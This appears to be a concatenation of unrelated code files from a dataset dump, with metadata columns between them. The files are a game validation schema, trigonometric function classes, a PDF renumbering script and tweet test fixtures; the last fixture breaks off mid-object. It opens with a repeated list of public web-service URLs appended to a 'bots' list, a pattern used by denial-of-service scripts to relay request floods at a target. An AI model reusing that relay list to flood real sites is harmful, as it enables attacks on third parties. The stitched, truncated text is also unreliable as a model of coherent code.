bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
| 60.021837
| 85
| 0.72212
| 13,632
| 93,454
| 4.930238
| 0.005722
| 0.213067
| 0.298293
| 0.22372
| 0.993885
| 0.993513
| 0.993513
| 0.993513
| 0.993513
| 0.993513
| 0
| 0.003218
| 0.045798
| 93,454
| 1,556
| 86
| 60.060411
| 0.750454
| 0
| 0
| 0.959871
| 0
| 0
| 0.723237
| 0.00654
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003884
| null | null | 0.031715
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
26f8cdc1c3609a8e28c8d8d4336c820dd7ceb09f
| 2,432
|
py
|
Python
|
source/schemas/game.py
|
julio9246/hg-poker-api
|
56805601bc26bf8bb80e05235ae22a59a174af09
|
[
"Apache-2.0"
] | null | null | null |
source/schemas/game.py
|
julio9246/hg-poker-api
|
56805601bc26bf8bb80e05235ae22a59a174af09
|
[
"Apache-2.0"
] | null | null | null |
source/schemas/game.py
|
julio9246/hg-poker-api
|
56805601bc26bf8bb80e05235ae22a59a174af09
|
[
"Apache-2.0"
] | null | null | null |
from source.schemas.validation import Validation
class GameSchema(Validation):
@staticmethod
def save():
return{
'tournament_id': {
'min': 0,
'nullable': False,
'required': True,
'type': 'integer'
},
'game_number': {
'min': 0,
'nullable': False,
'required': True,
'type': 'integer'
},
'localization': {
'nullable': False,
'required': False,
'type': 'string'
},
'date_start': {
'empty': False,
'nullable': False,
'required': True,
'type': 'string'
},
'date_end': {
'empty': False,
'nullable': False,
'required': False,
'type': 'string'
},
'qtd_rebuy_limit': {
'min': 0,
'nullable': False,
'required': True,
'type': 'integer'
},
'active': {
'empty': False,
'nullable': False,
'required': True,
'type': 'boolean'
}
}
@staticmethod
def update():
return {
'game_number': {
'min': 0,
'nullable': False,
'required': False,
'type': 'integer'
},
'localization': {
'nullable': False,
'required': False,
'type': 'string'
},
'date_start': {
'empty': False,
'nullable': False,
'required': True,
'type': 'string'
},
'date_end': {
'empty': False,
'nullable': False,
'required': False,
'type': 'string'
},
'qtd_rebuy_limit': {
'min': 0,
'nullable': False,
'required': False,
'type': 'integer'
},
'active': {
'empty': False,
'nullable': False,
'required': False,
'type': 'boolean'
}
}
| 26.725275
| 48
| 0.331414
| 141
| 2,432
| 5.638298
| 0.248227
| 0.212579
| 0.343396
| 0.228931
| 0.816352
| 0.816352
| 0.816352
| 0.769811
| 0.513208
| 0.513208
| 0
| 0.004496
| 0.542763
| 2,432
| 90
| 49
| 27.022222
| 0.710432
| 0
| 0
| 0.767442
| 0
| 0
| 0.216694
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| true
| 0
| 0.011628
| 0.023256
| 0.05814
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f82c2979f02cabeca3d3824b1ca1f25896b37e5e
| 156
|
py
|
Python
|
automl_toolbox/model_selection/__init__.py
|
farrajota/automl_toolbox
|
2a06e888f8f09ee963cde0ea1b993ee30743ec45
|
[
"MIT"
] | null | null | null |
automl_toolbox/model_selection/__init__.py
|
farrajota/automl_toolbox
|
2a06e888f8f09ee963cde0ea1b993ee30743ec45
|
[
"MIT"
] | null | null | null |
automl_toolbox/model_selection/__init__.py
|
farrajota/automl_toolbox
|
2a06e888f8f09ee963cde0ea1b993ee30743ec45
|
[
"MIT"
] | null | null | null |
"""
Methods and functions to fit and cross-validate models on data.
"""
from .cross_validation import cross_validation_score, cross_validation_score_iter
| 22.285714
| 81
| 0.814103
| 22
| 156
| 5.5
| 0.681818
| 0.371901
| 0.330579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121795
| 156
| 6
| 82
| 26
| 0.883212
| 0.403846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f82c7087f290895ff34d3296562f3bb0171216a7
| 137
|
py
|
Python
|
src/configflow/io/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 8
|
2022-01-25T09:06:34.000Z
|
2022-03-28T14:55:45.000Z
|
src/configflow/io/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 23
|
2022-01-23T15:15:00.000Z
|
2022-03-28T21:47:15.000Z
|
src/configflow/io/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 1
|
2022-03-15T21:08:19.000Z
|
2022-03-15T21:08:19.000Z
|
"""Package for the IO functionality."""
from configflow.io import dotenv
from configflow.io import ini
from configflow.io import loader
| 22.833333
| 39
| 0.79562
| 20
| 137
| 5.45
| 0.55
| 0.385321
| 0.440367
| 0.605505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131387
| 137
| 5
| 40
| 27.4
| 0.915966
| 0.240876
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f84d2341d82f27e92e13024bb7a3aebc2237c41b
| 2,328
|
py
|
Python
|
cake/functions/basic/trig.py
|
polo-sec/Cake
|
ab3ae8e53b9399ee011f77d6b6e918762e52da78
|
[
"MIT"
] | null | null | null |
cake/functions/basic/trig.py
|
polo-sec/Cake
|
ab3ae8e53b9399ee011f77d6b6e918762e52da78
|
[
"MIT"
] | 1
|
2021-10-10T16:41:01.000Z
|
2021-10-10T16:41:01.000Z
|
cake/functions/basic/trig.py
|
polo-sec/Cake
|
ab3ae8e53b9399ee011f77d6b6e918762e52da78
|
[
"MIT"
] | null | null | null |
# Trigonometric functions
from ..base import Function
import cake
import typing
import math
__all__ = ("Sin", "Cos", "Tan")
class Sin(Function):
def __init__(self, value, *, type: str = "radians") -> None:
super().__init__(value, name="sin")
self.type = type
def _raw_exec(self, other) -> typing.Any:
if isinstance(other, cake.Unknown):
unknown = other.copy()
unknown.data['functions'].append(self.__class__)
return unknown
if hasattr(other, 'value'):
other = other.value
if hasattr(other, 'get_value'):
other = other.get_value()
otherConverter = getattr(math, self.type, None)
if not otherConverter:
val = other
else:
val = otherConverter(other)
return cake.convert_type(math.sin(val))
class Cos(Function):
def __init__(self, value, *, type: str = "radians") -> None:
super().__init__(value, name="cos")
self.type = type
def _raw_exec(self, other) -> typing.Any:
if isinstance(other, cake.Unknown):
unknown = other.copy()
unknown.data['functions'].append(self.__class__)
return unknown
if hasattr(other, 'value'):
other = other.value
if hasattr(other, 'get_value'):
other = other.get_value()
otherConverter = getattr(math, self.type, None)
if not otherConverter:
val = other
else:
val = otherConverter(other)
return cake.convert_type(math.cos(val))
class Tan(Function):
def __init__(self, value, *, type: str = "radians") -> None:
super().__init__(value, name="tan")
self.type = type
def _raw_exec(self, other) -> typing.Any:
if isinstance(other, cake.Unknown):
unknown = other.copy()
unknown.data['functions'].append(self.__class__)
return unknown
if hasattr(other, 'value'):
other = other.value
if hasattr(other, 'get_value'):
other = other.get_value()
otherConverter = getattr(math, self.type, None)
if not otherConverter:
val = other
else:
val = otherConverter(other)
return cake.convert_type(math.tan(val))
| 26.758621
| 64
| 0.574313
| 256
| 2,328
| 5.007813
| 0.167969
| 0.037442
| 0.065523
| 0.044462
| 0.891576
| 0.891576
| 0.891576
| 0.891576
| 0.891576
| 0.891576
| 0
| 0
| 0.306271
| 2,328
| 86
| 65
| 27.069767
| 0.793808
| 0.00988
| 0
| 0.774194
| 0
| 0
| 0.046895
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.064516
| 0
| 0.306452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8849861845d29d47b15975daf849c46112620bb
| 21,432
|
py
|
Python
|
check_files_numeration_p31.py
|
mcjczapiewski/work
|
2540afa6b18bf6ff92a7c07b16695035785c0dd8
|
[
"MIT"
] | null | null | null |
check_files_numeration_p31.py
|
mcjczapiewski/work
|
2540afa6b18bf6ff92a7c07b16695035785c0dd8
|
[
"MIT"
] | null | null | null |
check_files_numeration_p31.py
|
mcjczapiewski/work
|
2540afa6b18bf6ff92a7c07b16695035785c0dd8
|
[
"MIT"
] | null | null | null |
import os
import regex
from natsort import natsorted, natsort_keygen
nkey = natsort_keygen()
count = 1
print(
"\nUWAGA! W folderze, we wskazanej przez użytkownika lokalizacji,\n\
może pojawić się plik bledy.txt!\n\n"
)
sciezka = input("Podaj ścieżkę do folderu: ")
for subdir, dirs, files in os.walk(sciezka):
dirs.sort(key=nkey)
aa = set()
bb = set()
if not any(fname.upper().endswith(".PDF") for fname in os.listdir(subdir)):
continue
kolejny = 1
for file in natsorted(files):
if file.upper().endswith(".PDF"):
bez_ope = file.split(os.path.basename(subdir))[1]
nr_tomu = myslnik = 0
if regex.match(r"^.T.+", bez_ope):
nr_tomu = 1
tom = regex.match(r"^.(T.*?)(_[1-9]|-[1-9])", bez_ope)[1]
bez_ope = regex.match(
r"^.T.*?((_[1-9].+$)|-[1-9].+$)", bez_ope
)[1]
if bez_ope.startswith("-"):
myslnik = 1
numer = int(bez_ope.split("-", 1)[1].split("-")[0])
else:
numer = int(bez_ope.split("_")[1].split("-")[0])
if not numer == kolejny:
print(str(count) + "\t" + file)
count += 1
plik = os.path.join(subdir, file)
if nr_tomu == 1:
if regex.match(
os.path.basename(subdir) + "-T[0-9].+", file
):
operat = os.path.basename(subdir) + "-" + tom + "_"
elif myslnik == 1:
operat = os.path.basename(subdir) + "_" + tom + "-"
else:
operat = os.path.basename(subdir) + "_" + tom + "_"
else:
operat = os.path.basename(subdir) + "_"
if (
regex.match(os.path.basename(subdir) + "-T[0-9].+", file)
or myslnik == 1
):
dokument = "-" + file.split("-", 2)[2]
else:
dokument = "-" + file.split("-", 1)[1]
nazwa = os.path.join(subdir, operat + str(kolejny) + dokument)
try:
os.rename(plik, nazwa)
except:
try:
aa_nazwa = os.path.join(
subdir, operat + str(kolejny) + "aaa" + dokument
)
os.rename(plik, aa_nazwa)
aa.add(aa_nazwa)
except:
try:
bb_nazwa = os.path.join(
subdir,
operat + str(kolejny) + "bbb" + dokument,
)
os.rename(plik, bb_nazwa)
bb.add(bb_nazwa)
except:
with open(
os.path.join(sciezka, "bledy.txt"), "a"
) as bl:
bl.write(
plik
+ "\t"
+ nazwa
+ "\tNie udało się zmienić nazwy pliku.\n"
)
wkt = os.path.join(subdir, os.path.splitext(file)[0] + ".wkt")
if os.path.exists(wkt) and any(
i in wkt for i in (("SZK-POL", "M-WYN", "M-WYW", "M-UZ"))
):
print(str(count) + "\t" + os.path.basename(wkt))
count += 1
try:
os.rename(wkt, os.path.splitext(nazwa)[0] + ".wkt")
except:
try:
aa_nazwa = os.path.join(
subdir,
operat
+ str(kolejny)
+ "aaa"
+ os.path.splitext(dokument)[0]
+ ".wkt",
)
os.rename(plik, aa_nazwa)
aa.add(aa_nazwa)
except:
try:
bb_nazwa = os.path.join(
subdir,
operat
+ str(kolejny)
+ "bbb"
+ os.path.splitext(dokument)[0]
+ ".wkt",
)
os.rename(plik, bb_nazwa)
bb.add(bb_nazwa)
except:
with open(
os.path.join(sciezka, "bledy.txt"), "a"
) as bl:
bl.write(
wkt
+ "\t"
+ os.path.splitext(nazwa)[0]
+ ".wkt"
+ "\tNie udało się zmienić \
nazwy pliku.\n"
)
kolejny += 1
for i in aa:
try:
os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("aaa")[0]
+ i.split("aaa")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
for i in bb:
try:
os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("bbb")[0]
+ i.split("bbb")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
aa = set()
bb = set()
duble = {}
for _, _, files in os.walk(subdir):
for file in natsorted(files):
if file.upper().endswith(".PDF"):
nazwa = file.split(os.path.basename(subdir))[1]
typ = regex.match(
r".+?([A-Z].*[A-Z])", str(os.path.splitext(nazwa)[0])
)[1]
if typ not in duble:
duble[typ] = 1
elif typ in duble:
do_tego = duble[typ]
do_tego += 1
duze_litery = file.upper()
pierwotna = regex.match(r"^.+-(.+)\.PDF", duze_litery)[
1
].zfill(3)
if not str(pierwotna) == str(do_tego).zfill(3):
print(str(count) + "\t" + file)
count += 1
bylo = file.split(pierwotna)[0]
rozszerzenie = os.path.splitext(file)[1]
bedzie = bylo + str(do_tego).zfill(3) + rozszerzenie
try:
os.rename(
os.path.join(subdir, file),
os.path.join(subdir, bedzie),
)
except:
try:
aa_nazwa = os.path.join(
subdir,
bylo
+ "aaa"
+ str(do_tego).zfill(3)
+ rozszerzenie,
)
os.rename(plik, aa_nazwa)
aa.add(aa_nazwa)
except:
try:
bb_nazwa = os.path.join(
subdir,
bylo
+ "bbb"
+ str(do_tego).zfill(3)
+ rozszerzenie,
)
os.rename(plik, bb_nazwa)
bb.add(bb_nazwa)
except:
with open(
os.path.join(sciezka, "bledy.txt"), "a"
) as bl:
bl.write(
os.path.join(subdir, file)
+ "\t"
+ os.path.join(subdir, bedzie)
+ "\tNie udało się zmienić \
nazwy pliku.\n"
)
wkt = os.path.join(
subdir, os.path.splitext(file)[0] + ".wkt"
)
if os.path.exists(wkt):
print(str(count) + "\t" + os.path.basename(wkt))
count += 1
rozszerzenie = ".wkt"
bedzie = (
bylo + str(do_tego).zfill(3) + rozszerzenie
)
try:
os.rename(wkt, os.path.join(subdir, bedzie))
except:
try:
aa_nazwa = os.path.join(
subdir,
bylo
+ "aaa"
+ str(do_tego).zfill(3)
+ rozszerzenie,
)
os.rename(plik, aa_nazwa)
aa.add(aa_nazwa)
except:
try:
bb_nazwa = os.path.join(
subdir,
bylo
+ "bbb"
+ str(do_tego).zfill(3)
+ rozszerzenie,
)
os.rename(plik, bb_nazwa)
bb.add(bb_nazwa)
except:
with open(
os.path.join(sciezka, "bledy.txt"),
"a",
) as bl:
bl.write(
wkt
+ "\t"
+ os.path.join(subdir, bedzie)
+ "\tNie udało się zmienić \
nazwy pliku.\n"
)
duble[typ] = do_tego
for i in aa:
try:
os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("aaa")[0]
+ i.split("aaa")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
for i in bb:
try:
os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("bbb")[0]
+ i.split("bbb")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
aa = set()
bb = set()
for _, _, files in os.walk(subdir):
for file in natsorted(files):
if file.upper().endswith((".TXT", ".KCD", ".DXF", ".DWG")):
bez_ope = file.split(os.path.basename(subdir))[1]
nr_tomu = myslnik = 0
if regex.match(r"^.T.+", bez_ope):
nr_tomu = 1
tom = regex.match(r"^.(T.*?)(_[1-9]|-[1-9])", bez_ope)[1]
bez_ope = regex.match(
r"^.T.*?((_[1-9].+$)|-[1-9].+$)", bez_ope
)[1]
if bez_ope.startswith("-"):
myslnik = 1
numer = int(bez_ope.split("-", 1)[1].split("-")[0])
else:
numer = int(bez_ope.split("_")[1].split("-")[0])
if not numer == kolejny:
print(str(count) + "\t" + file)
count += 1
plik = os.path.join(subdir, file)
if nr_tomu == 1:
if regex.match(
os.path.basename(subdir) + "-T[0-9].+", file
):
operat = os.path.basename(subdir) + "-" + tom + "_"
elif myslnik == 1:
operat = os.path.basename(subdir) + "_" + tom + "-"
else:
operat = os.path.basename(subdir) + "_" + tom + "_"
else:
operat = os.path.basename(subdir) + "_"
if (
regex.match(
os.path.basename(subdir) + "-T[0-9].+", file
)
or myslnik == 1
):
dokument = "-" + file.split("-", 2)[2]
else:
dokument = "-" + file.split("-", 1)[1]
nazwa = os.path.join(
subdir, operat + str(kolejny) + dokument
)
try:
os.rename(plik, nazwa)
except:
try:
aa_nazwa = os.path.join(
subdir,
operat + str(kolejny) + "aaa" + dokument,
)
os.rename(plik, aa_nazwa)
aa.add(aa_nazwa)
except:
try:
bb_nazwa = os.path.join(
subdir,
operat + str(kolejny) + "bbb" + dokument,
)
os.rename(plik, bb_nazwa)
bb.add(bb_nazwa)
except:
with open(
os.path.join(sciezka, "bledy.txt"), "a"
) as bl:
bl.write(
plik
+ "\t"
+ nazwa
+ "\tNie udało się zmienić \
nazwy pliku.\n"
)
kolejny += 1
for i in aa:
try:
os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("aaa")[0]
+ i.split("aaa")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
for i in bb:
try:
os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("bbb")[0]
+ i.split("bbb")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
aa = set()
bb = set()
ponownie = {}
for _, _, files in os.walk(subdir):
for file in natsorted(files):
if file.upper().endswith((".TXT", ".KCD", ".DXF", ".DWG")):
nazwa = file.split(os.path.basename(subdir))[1]
nr_tomu = 0
if regex.match(r"^.T.+", nazwa):
nr_tomu = 1
tom = regex.match(r"^.(T.*?)(_[1-9]|-[1-9])", nazwa)[1]
nazwa = regex.match(
r"^.T.*?((_[1-9].+$)|-[1-9].+$)", nazwa
)[1]
if nazwa.startswith("-"):
typ = int(nazwa.split("-")[1])
else:
typ = int(nazwa.split("_")[1].split("-")[0])
rozszerz = os.path.splitext(nazwa)[1]
if rozszerz not in ponownie:
ponownie[rozszerz] = 1
continue
elif rozszerz in ponownie:
do_tego = ponownie[rozszerz]
do_tego += 1
duze_litery = file.upper()
pierwotna = regex.match(
r"^.+-(.+)" + rozszerz.upper(), duze_litery
)[1].zfill(3)
if not str(pierwotna) == str(do_tego).zfill(3):
print(str(count) + "\t" + file)
count += 1
bylo = file.split(pierwotna)[0]
rozszerzenie = os.path.splitext(file)[1]
bedzie = bylo + str(do_tego).zfill(3) + rozszerzenie
try:
os.rename(
os.path.join(subdir, file),
os.path.join(subdir, bedzie),
)
except:
try:
aa_nazwa = os.path.join(
subdir,
bylo
+ "aaa"
+ str(do_tego).zfill(3)
+ rozszerzenie,
)
os.rename(plik, aa_nazwa)
aa.add(aa_nazwa)
except:
try:
bb_nazwa = os.path.join(
subdir,
bylo
+ "bbb"
+ str(do_tego).zfill(3)
+ rozszerzenie,
)
os.rename(plik, bb_nazwa)
bb.add(bb_nazwa)
except:
with open(
os.path.join(sciezka, "bledy.txt"), "a"
) as bl:
bl.write(
os.path.join(subdir, file)
+ "\t"
+ os.path.join(subdir, bedzie)
+ "\tNie udało się zmienić \
nazwy pliku.\n"
)
ponownie[rozszerz] = do_tego
for i in aa:
try:
os.rename(i, i.split("aaa")[0] + i.split("aaa")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("aaa")[0]
+ i.split("aaa")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
for i in bb:
try:
os.rename(i, i.split("bbb")[0] + i.split("bbb")[1])
except:
with open(os.path.join(sciezka, "bledy.txt"), "a") as bl:
bl.write(
i
+ "\t"
+ i.split("bbb")[0]
+ i.split("bbb")[1]
+ "\tNie udało się zmienić nazwy pliku.\n"
)
input("\nTHE END. Press something...")
| 42.9499
| 79
| 0.295119
| 1,693
| 21,432
| 3.67218
| 0.076196
| 0.069487
| 0.067557
| 0.07206
| 0.889175
| 0.880489
| 0.868908
| 0.868908
| 0.862474
| 0.848319
| 0
| 0.017493
| 0.597238
| 21,432
| 498
| 80
| 43.036145
| 0.702734
| 0
| 0
| 0.780538
| 0
| 0
| 0.050532
| 0.007279
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006211
| 0
| 0.006211
| 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f88f24d5f53b79992d43bac21e30e30fb4c74503
| 49,996
|
py
|
Python
|
tests/tweets.py
|
sebastian-nagel/sfm-twitter-harvester
|
0fe1d39c34faf80a147457cad18c332e2b64ad36
|
[
"MIT"
] | 12
|
2016-09-07T15:15:10.000Z
|
2021-05-03T23:05:13.000Z
|
tests/tweets.py
|
sebastian-nagel/sfm-twitter-harvester
|
0fe1d39c34faf80a147457cad18c332e2b64ad36
|
[
"MIT"
] | 17
|
2015-11-19T18:26:31.000Z
|
2021-06-22T12:43:27.000Z
|
tests/tweets.py
|
sebastian-nagel/sfm-twitter-harvester
|
0fe1d39c34faf80a147457cad18c332e2b64ad36
|
[
"MIT"
] | 6
|
2016-01-30T16:46:15.000Z
|
2021-01-22T20:01:03.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
tweet1 = {
"created_at": "Tue Jun 02 13:22:55 +0000 2015",
"id": 605726286741434400,
"id_str": "605726286741434368",
"text": "At LC for @archemail today: Thinking about overlap between email archiving, web archiving, and social media archiving.",
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"truncated": False,
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 481186914,
"id_str": "481186914",
"name": "Justin Littman",
"screen_name": "justin_littman",
"location": "",
"description": "",
"url": None,
"entities": {
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 45,
"friends_count": 47,
"listed_count": 5,
"created_at": "Thu Feb 02 12:19:18 +0000 2012",
"favourites_count": 34,
"utc_offset": -14400,
"time_zone": "Eastern Time (US & Canada)",
"geo_enabled": True,
"verified": False,
"statuses_count": 72,
"lang": "en",
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "C0DEED",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_tile": False,
"profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"profile_link_color": "0084B4",
"profile_sidebar_border_color": "C0DEED",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": True,
"default_profile_image": False,
"following": False,
"follow_request_sent": False,
"notifications": False
},
"geo": None,
"coordinates": None,
"place": {
"id": "01fbe706f872cb32",
"url": "https://api.twitter.com/1.1/geo/id/01fbe706f872cb32.json",
"place_type": "city",
"name": "Washington",
"full_name": "Washington, DC",
"country_code": "US",
"country": "United States",
"contained_within": [],
"bounding_box": {
"type": "Polygon",
"coordinates": [
[
[
-77.119401,
38.801826
],
[
-76.909396,
38.801826
],
[
-76.909396,
38.9953797
],
[
-77.119401,
38.9953797
]
]
]
},
"attributes": {}
},
"contributors": None,
"is_quote_status": False,
"retweet_count": 0,
"favorite_count": 0,
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [],
"urls": []
},
"favorited": False,
"retweeted": False,
"lang": "en"
}
# tweet2 has a url
tweet2 = {
"created_at": "Fri Oct 30 12:06:15 +0000 2015",
"id": 660065173563158500,
"id_str": "660065173563158529",
"text": "My new blog post on techniques for harvesting social media to WARCs: https://t.co/OHZki6pXEe",
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"truncated": False,
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 481186914,
"id_str": "481186914",
"name": "Justin Littman",
"screen_name": "justin_littman",
"location": "",
"description": "",
"url": None,
"entities": {
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 52,
"friends_count": 50,
"listed_count": 5,
"created_at": "Thu Feb 02 12:19:18 +0000 2012",
"favourites_count": 50,
"utc_offset": -18000,
"time_zone": "Eastern Time (US & Canada)",
"geo_enabled": True,
"verified": False,
"statuses_count": 85,
"lang": "en",
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "C0DEED",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_tile": False,
"profile_image_url": "http://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/496478011533713408/GjecBUNj_normal.jpeg",
"profile_link_color": "0084B4",
"profile_sidebar_border_color": "C0DEED",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": True,
"default_profile_image": False,
"following": False,
"follow_request_sent": False,
"notifications": False
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": False,
"retweet_count": 10,
"favorite_count": 9,
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [],
"urls": [
{
"url": "https://t.co/OHZki6pXEe",
"expanded_url": "http://bit.ly/1ipwd0B",
"display_url": "bit.ly/1ipwd0B",
"indices": [
69,
92
]
}
]
},
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"possibly_sensitive_appealable": False,
"lang": "en"
}
# tweet3 has an extended entity.
tweet3 = {
"contributors": None,
"truncated": False,
"text": "Test tweet 9. Tweet with a GIF. https://t.co/x6AYFg3REg",
"is_quote_status": False,
"in_reply_to_status_id": None,
"id": 727894186415013888,
"favorite_count": 0,
"source": "<a href=\"http://twitter.com\" rel=\"nofollow\">Twitter Web Client</a>",
"retweeted": False,
"coordinates": None,
"entities": {
"symbols": [],
"user_mentions": [],
"hashtags": [],
